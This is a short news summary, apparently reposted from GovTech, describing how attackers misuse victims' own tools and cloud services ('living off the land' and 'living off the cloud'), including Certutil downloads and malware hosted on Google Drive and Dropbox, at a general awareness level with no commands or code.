"'Living Off the Cloud': Hackers Modernize an Old-School Tactic"

As governments and other players increasingly rely on the cloud, malicious actors are following suit, reintroducing "living off the cloud" attacks into their operations. "Living off the land" (LotL) schemes involve hackers gaining access to a victim's networks via phishing or other methods, then using the victim's own tools and services for malicious purposes. According to cybersecurity firm Darktrace, these attacks are particularly subtle and date back to at least 2013. A more recent subset of this is living off the cloud, which makes use of the victims' cloud services. The attack's name is derived from the physical world lifestyle of living off the land, in which practitioners rely on food and other resources harvested from the surrounding nature. Hackers using tools found in the victim's environment are the cybersecurity equivalent. According to Johannes Ullrich, dean of research at the SANS Technology Institute, malicious actors could, for example, use the Windows Certutil tool, designed to allow users to download files from the Internet, to download malware. Hackers can stay under the radar by using the tool as it was intended. The method is often used for espionage or to extort money by threatening to leak data. It may be easier for victims to detect malicious code deployed on their networks than it is to detect when a legitimate tool is used for malicious purposes. Another example would be a malicious party directing victims' backup solutions to copy data to a hacker-owned storage location. Attackers may also use cloud services to host malware and send phishing links from trusted web domains. Palo Alto Networks, for example, recently revealed that the criminal group behind the SolarWinds attack was hosting malware on popular cloud storage services such as Google Drive and Dropbox. The hackers then send phishing emails with URLs that, if clicked, download malware from the cloud hosting and onto the victims' systems. This is a new tactic for this actor, and it is difficult to detect due to the pervasiveness of these services and the trust placed in them by millions of customers worldwide. This article continues to discuss LotL attacks and the cloud-related subset of such attacks. 

GovTech reports "'Living Off the Cloud': Hackers Modernize an Old-School Tactic"

Submitted by Anonymous on